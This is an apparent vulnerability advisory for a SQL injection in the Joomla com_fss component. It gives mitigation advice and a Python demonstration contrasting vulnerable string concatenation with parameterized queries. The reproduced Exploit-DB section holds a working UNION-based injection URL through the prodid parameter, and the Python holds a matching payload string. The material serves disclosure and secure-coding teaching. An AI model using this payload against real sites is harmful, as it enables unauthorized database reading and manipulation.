Vendor: Freestyle Support System
By: Daniel Barragan 'D4NB4R'
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: Freestyle Support System
Affected Version From: 1.9.1.1447
Affected Version To: 1.9.1.1447
Patch Exists: YES
Related CWE: N/A
CPE: a:freestyle-joomla:freestyle_support_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux(bt5)-Windows(7ultimate)
Date: 2012

Joomla Freestyle Support com_fss sqli

An SQL injection vulnerability exists in the com_fss component (Freestyle Support System 1.9.1.1447) for Joomla. The prodid request parameter is placed into a database query inside a quoted string without being escaped or type-checked, so a remote attacker can send a crafted HTTP GET request to index.php and execute arbitrary SQL against the back-end database; the proof of concept below closes the string literal with a quote and appends a UNION ALL SELECT that returns the result of version(). This can result in the disclosure or manipulation of application data.

Mitigation:

Upgrade to a fixed release (the vendor has published a patch; see "Patch Exists" above). In code, never concatenate request parameters into SQL: use parameterized queries or the database layer's quoting, and enforce the expected type first (prodid is a record identifier, so cast or validate it as an integer before it reaches the query). Input validation is a useful second layer, not a substitute for parameterization.
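As an added illustration (not code from this page or from the Freestyle Support System project), the following Python models the flaw and its fix against an in-memory SQLite table. The table name, column names and sample rows are constructed; the real com_fss schema is not on the page. The payload mirrors the shape of the proof-of-concept URL in the raw data below: a quote ends the string literal, UNION ALL SELECT supplies exactly as many columns as the original query (11 on the page, 4 for the toy table here), one column calls the database's version function (sqlite_version() stands in for MySQL's version()), and a trailing comment swallows the closing quote.

```python
import sqlite3

# Constructed stand-in for the component's product table. The real com_fss
# schema is not on the page; table and column names here are assumptions.
SCHEMA = """
CREATE TABLE fss_prod (id INTEGER, title TEXT, description TEXT, published INTEGER);
INSERT INTO fss_prod VALUES (1, 'Widget', 'A widget', 1);
INSERT INTO fss_prod VALUES (2, 'Gadget', 'A gadget', 1);
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def db_version(conn):
    """What the injected column will leak: the engine's version string."""
    return conn.execute("SELECT sqlite_version()").fetchone()[0]


def lookup_vulnerable(conn, prodid):
    """Models the flaw: the prodid request parameter is wrapped in quotes and
    concatenated into the statement, so a quote in the value escapes the literal."""
    sql = ("SELECT id, title, description, published FROM fss_prod "
           "WHERE id = '%s'" % prodid)
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        # A syntactically broken query fails here. In the PHP original a failed
        # query hands a non-array to the template, which is the likely origin of
        # the 'Invalid argument supplied for foreach()' warning quoted on the page.
        return None


def lookup_fixed(conn, prodid):
    """Parameterized form: the value is bound by the driver and can never
    change the statement's structure."""
    sql = "SELECT id, title, description, published FROM fss_prod WHERE id = ?"
    return conn.execute(sql, (prodid,)).fetchall()


def valid_prodid(value):
    """prodid is a record identifier, so anything but digits is rejected."""
    return str(value).isdigit()


def lookup_fixed_int(conn, prodid):
    """Stricter variant: type-check before the query is ever built
    (the equivalent of a (int) cast in PHP), then bind the integer."""
    if not valid_prodid(prodid):
        raise ValueError("prodid must be a positive integer")
    return lookup_fixed(conn, int(prodid))


# Same shape as the page's payload: quote closes the literal, UNION ALL SELECT
# matches the column count of the original query (11 on the page, 4 here),
# one column carries the version function, the comment discards the trailing quote.
PAYLOAD = "777777.7' union all select 1, 2, sqlite_version(), 4-- D4NB4R"

if __name__ == "__main__":
    db = open_db()
    print("probe with a lone quote :", lookup_vulnerable(db, "'"))
    print("vulnerable + payload    :", lookup_vulnerable(db, PAYLOAD))
    print("parameterized + payload :", lookup_fixed(db, PAYLOAD))
    print("parameterized + '1'     :", lookup_fixed(db, "1"))
```

Run it directly to see the cases printed: the lone quote breaks the query (the error path behind the PHP warning), the payload returns a row containing the version string from the vulnerable function, and the same payload returns nothing from the parameterized one. In the component's own PHP the equivalent fix is to cast prodid with (int), or pass it through the Joomla database object's quote() method, before it is interpolated into the query.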

Exploit-DB raw data:

Exploit Title: Joomla Freestyle Support com_fss sqli
Dork: N/A
Date: [17-10-2012]
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
Vendor: http://freestyle-joomla.com
Version: Version 1.9.1.1447 (last update on Oct 15, 2012)
License: Commercial
Download: http://freestyle-joomla.com/fssdownloads
Tested on: [Linux(bt5)-Windows(7ultimate)]
Special greetz: Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Description of the Joomla component:

Advanced ticketed support/help desk on your website. Includes Knowledge Base, FAQs, Announcements, Glossary, Tickets by Email, Testimonials and many other features. Robust, customizable, professional, affordable and easy to use.

Warning: Invalid argument supplied for foreach() in 


Exploit:

    SQL : SQL injection

    http://127.0.0.1/index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R

_____________________________________________________
Daniel Barragan "D4NB4R" 2012